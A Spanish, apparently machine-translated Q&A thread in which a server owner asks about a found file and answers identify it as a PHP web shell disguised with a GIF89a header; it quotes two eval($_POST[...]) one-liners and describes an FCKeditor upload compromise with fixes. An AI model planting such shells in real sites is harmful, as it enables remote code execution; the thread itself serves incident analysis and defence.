Encontré este archivo en mi servidor, contiene el siguiente código:
GIF89a
<?php eval ($_POST[plm12345plm]); ?>
No hay otro código al lado de este. ¿Es esto malicioso?
Encontré este archivo en mi servidor, contiene el siguiente código:
GIF89a
<?php eval ($_POST[plm12345plm]); ?>
No hay otro código al lado de este. ¿Es esto malicioso?
Sí, esto es pícaro. Este script ejecutará cualquier código PHP pasado como parámetro plm12345plm POST. Esto significa que un atacante puede ejecutar PHP arbitrario y, dependiendo de la configuración del servidor, más código en su servidor.
La primera línea GIF89a probablemente se coloque para omitir la verificación básica de archivos durante la carga del script como una imagen GIF.
Si el archivo podría ejecutarse, considere el servidor según lo comprometido . Si no es ejecutable directamente , aún podría explotarse usando ataques de inclusión de archivos locales .
Sí, este es un shell web PHP. Eval debe ser la bandera roja.
Básicamente, si el usuario puede acceder a este archivo en su servidor, es posible que pueda ejecutar comandos del sistema operativo. Si ha implementado correctamente su sitio, el atacante no debería poder engañar a PHP para que ejecute el código en lo que supongo que es un archivo .GIF.
Sin embargo, si fuera usted, aplastaría las escotillas y comenzaría los procedimientos de respuesta a incidentes. Alguien definitivamente intentó entrar, y sin más investigación, no sabrás si tuvieron éxito.
Mi servidor fue hackeado con el mismo método. El ISP de mi servidor vio una gran carga de red, desconectó el servidor y me informó.
El archivo ali.jpg tiene un código textual: GIF89a?lovealihack <?php eval($_POST[alihackxx])?>
Este archivo estaba esperando al menos desde el inicio de 2015 (lo rastreé en mis copias de seguridad). Se encuentra en la URL del sitio escribible / userfiles / Image. Cuando se llama desde un formulario externo con la variable alihackxx y el método POST que contiene código PHP en la variable, el Servidor Apache lo ejecutará como usuario de datos www y contaminó TODOS los sitios con un directorio grabable Media, FILE y muchos JPG y PHP. Archivos para atacar en otros servidores.
Lo más probable es que sea causado por el (antiguo) FCKeditor que uso en todos los sitios, lo que le permite al usuario cargar una imagen que se insertará en la página del sitio de usuarios. También hay una forma de insertar datos en un sitio de escritura / directorio escribible a través del método PUT. Es posible desactivar el uso de este método.
Solución inmediata / prevención:
Me sorprende ver una vulnerabilidad tan simple. Tengo malos sentimientos por haber sido hackeado.
Cambié todo (URL del sitio) 777 (directorios editables) a 755 que solo se pueden escribir para usuarios de FTP / servidor, por lo que Apache (usuario de datos www) ya no puede escribir en ellos.
ToDo's:
Mis clientes aún necesitan cargar archivos JPG, MP3 y PDF.
Deben pasar una puerta de enlace de carga adecuada que lea el archivo de <?php malicioso y eval(
Tampoco es divertido ajustar los formularios de correo con archivos adjuntos. Es importante que el archivo adjunto no se encuentre en la URL del sitio / directorio grabable.
Espero haberles informado sobre este hackeo del servidor y espero que puedan evitar que su servidor sea hackeado.